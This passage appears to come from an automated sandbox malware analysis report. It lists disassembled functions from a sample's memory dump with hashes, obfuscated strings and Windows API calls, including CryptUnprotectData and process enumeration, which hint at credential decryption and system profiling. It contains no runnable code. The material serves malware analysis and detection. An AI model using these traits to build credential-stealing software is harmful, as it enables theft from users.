                            • Opcode Fuzzy Hash: 8ed86cffa4d7a7014a2709765f360c4b30189d2214e7b82908a8b2f8413a4f60
                            • Instruction Fuzzy Hash: 0AB12B31900214CFC715CF14D948B56B7F5BB4532AF29C1AAD8089B3A2D7BA9D86CF94
                            Function 0080563B Relevance: 10.4, Strings: 7, Instructions: 1661COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: /iy=$?4U}$hW.s$pZON$tV}Z$yE$Xgn
                            • API String ID: 0-3159013932
                            • Opcode ID: 60bcfaf9b0d98ed1bc3cff0774b54638554eb3357ea3897730ed9e83321fce77
                            • Instruction ID: 583740ea23a651ce0ab582f6188785471f47fc5c6f798ca5ec9f0e3832fbd14a
                            • Opcode Fuzzy Hash: 60bcfaf9b0d98ed1bc3cff0774b54638554eb3357ea3897730ed9e83321fce77
                            • Instruction Fuzzy Hash: C5B24AF360C2049FE3046E2DEC8567AFBE9EF94320F1A4A3DE6C4C7744E93598458696
                            Function 00803A6D Relevance: 10.4, Strings: 7, Instructions: 1656COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: " w$7?Vv$9_6$>cL$?K^$P6=$Rcs
                            • API String ID: 0-2655604428
                            • Opcode ID: 5267d3cae98c24d3747d4d77e8d7d63e67feec4e0fc7072fdc582b38916976ce
                            • Instruction ID: 4537ff4485cebb4fe61d37e0a30917143ab2a755c8bd1a17eea262b2545de886
                            • Opcode Fuzzy Hash: 5267d3cae98c24d3747d4d77e8d7d63e67feec4e0fc7072fdc582b38916976ce
                            • Instruction Fuzzy Hash: 50B206F360C2049FE704AE29EC8567AFBE9EF94320F16493DEAC4C7744E63598058697
                            Function 00801F8E Relevance: 9.1, Strings: 6, Instructions: 1642COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 0U_m$jGv~$m4}$pqs$F)0$}}m
                            • API String ID: 0-671250135
                            • Opcode ID: c4c1bf8d316208c73746fee1521d5efaa40227b6176bf343bc7e4338368feaa7
                            • Instruction ID: 14b06fbf403c8309e349d2bfe92d9e86067a2b23db269343a0e4b3a78c402388
                            • Opcode Fuzzy Hash: c4c1bf8d316208c73746fee1521d5efaa40227b6176bf343bc7e4338368feaa7
                            • Instruction Fuzzy Hash: BCB2F6F360C204AFE308AE2DDC8567AF7E9EF94320F1A493DE6C5C7744E63598058696
                            Function 007F6661 Relevance: 9.1, Strings: 6, Instructions: 1592COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ^]$D9;$k\{W$p:2$nSS$o
                            • API String ID: 0-1032110692
                            • Opcode ID: 2528b4ac6deb1b90d0d2bb1229b5bef87ee4084a892c812e8e875eda1087b70e
                            • Instruction ID: a42e477e64507da5f51edc4df9c6482fb74065ef9039449b3519563f537e97d1
                            • Opcode Fuzzy Hash: 2528b4ac6deb1b90d0d2bb1229b5bef87ee4084a892c812e8e875eda1087b70e
                            • Instruction Fuzzy Hash: 8CB2F5F360C2049FE304AF2DEC8567ABBE9EF94720F16893DE6C4C7744EA3558058696
                            Function 00452C10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00452C42
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00452C49
                            • GetTimeZoneInformation.KERNEL32(?), ref: 00452C58
                            • wsprintfA.USER32 ref: 00452C83
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID: wwww
                            • API String ID: 3317088062-671953474
                            • Opcode ID: 1dee454ac953ce4a0fcd2d791f4fafb2d8d1e68daf0397365b76ac84b5bf676e
                            • Instruction ID: fc761e095e2507f1c680fb494d3fa76090c593e1ec0643467a3f4712015fadee
                            • Opcode Fuzzy Hash: 1dee454ac953ce4a0fcd2d791f4fafb2d8d1e68daf0397365b76ac84b5bf676e
                            • Instruction Fuzzy Hash: E9012B71A00604BBDB188F58DD09F6EB76EEB85721F10436AFD15D73C0D7B419048AE5
                            Function 007F4AE4 Relevance: 7.9, Strings: 5, Instructions: 1670COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Et{+$Kq_~$dq>$nto$nto
                            • API String ID: 0-1551151224
                            • Opcode ID: 59dfc5ac91c025a1c07b84a8dd6c9a296a2979db22e2b58ecab3eb2d576e981e
                            • Instruction ID: 16dbb47e85cc5de5cdd3f79fb99552bee5c19a7552e62c6ac3b42f787f18bf35
                            • Opcode Fuzzy Hash: 59dfc5ac91c025a1c07b84a8dd6c9a296a2979db22e2b58ecab3eb2d576e981e
                            • Instruction Fuzzy Hash: F3B239F360C6049FE3046E2DEC8567AFBE9EB94720F1A493DEAC4C7744EA3558018697
                            Function 0080C281 Relevance: 7.8, Strings: 5, Instructions: 1570COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 'K|$.(N_$:u{b$@wwi$JoR{
                            • API String ID: 0-1382821898
                            • Opcode ID: 29886ba23a1cea897225772cf146e9c1b65b835286bb5edc3e7808b599db82f0
                            • Instruction ID: 295a804fba6e864197e93f8e5b962ff1ddfb17484d7ee4e810ed1e1fe53a6327
                            • Opcode Fuzzy Hash: 29886ba23a1cea897225772cf146e9c1b65b835286bb5edc3e7808b599db82f0
                            • Instruction Fuzzy Hash: 40B2F5F39082109FE304AE2DDC8567ABBE9EF94720F1A493DEAC4D3744EA7558018797
                            Function 00437750 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0043775E
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00437765
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0043778D
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004377AD
                            • LocalFree.KERNEL32(?), ref: 004377B7
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: ca598940e75808443168f58da36d380e8293f0aa8997b46be14caf693007a5a5
                            • Instruction ID: 3da8eabc2fda917476209278910695ab9a636bff5220e633a6f6b2e4b1963256
                            • Opcode Fuzzy Hash: ca598940e75808443168f58da36d380e8293f0aa8997b46be14caf693007a5a5
                            • Instruction Fuzzy Hash: 0F010075B40308BBEB10DBA49C4AFAA7B7DEB44B15F104155FE05EB2C0D6B0A9008BA4
                            Function 007F8174 Relevance: 6.6, Strings: 4, Instructions: 1585COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 77g$Y|<$Qk$$]
                            • API String ID: 0-2330177650
                            • Opcode ID: b211a63fd50a57627eec5df5badce27b11b681f2e1abc91822341fe108710aac
                            • Instruction ID: 192f6ae27cb8a87be253c81d3889346a9b9d611161c3bff8b42628958af7b61e
                            • Opcode Fuzzy Hash: b211a63fd50a57627eec5df5badce27b11b681f2e1abc91822341fe108710aac
                            • Instruction Fuzzy Hash: 12B2E5F3A0C2049FE304AE29EC8567AB7E5EF94320F1A493DEAC5C3744EA3558158697
                            Function 00453A50 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 004571E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004571FE
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00453A96
                            • Process32First.KERNEL32(00000000,00000128), ref: 00453AA9
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00453ABF
                              • Part of subcall function 00457310: lstrlen.KERNEL32(------,00435BEB), ref: 0045731B
                              • Part of subcall function 00457310: lstrcpy.KERNEL32(00000000), ref: 0045733F
                              • Part of subcall function 00457310: lstrcat.KERNEL32(?,------), ref: 00457349
                              • Part of subcall function 00457280: lstrcpy.KERNEL32(00000000), ref: 004572AE
                            • CloseHandle.KERNEL32(00000000), ref: 00453BF7
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: 66f3177b3faf61085d93dad02ba030a92ecd4505a0ed3ea7570a450d24f5f775
                            • Instruction ID: d394cb488db35894b1fc88b60a4c41c02f344d63f8323cd12e90783a6c07d9b1
                            • Opcode Fuzzy Hash: 66f3177b3faf61085d93dad02ba030a92ecd4505a0ed3ea7570a450d24f5f775
                            • Instruction Fuzzy Hash: 2B810831900204CFC715CF19D848B96B7B5FB4535AF29C1AED8089B3A3D77AAD8ACB54
                            Function 0043EA30 Relevance: 6.1, APIs: 4, Instructions: 98stringencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0043EA76
                            • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0043EA7E
                            • lstrcat.KERNEL32(0045CFEC,0045CFEC), ref: 0043EB27
                            • lstrcat.KERNEL32(0045CFEC,0045CFEC), ref: 0043EB49
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
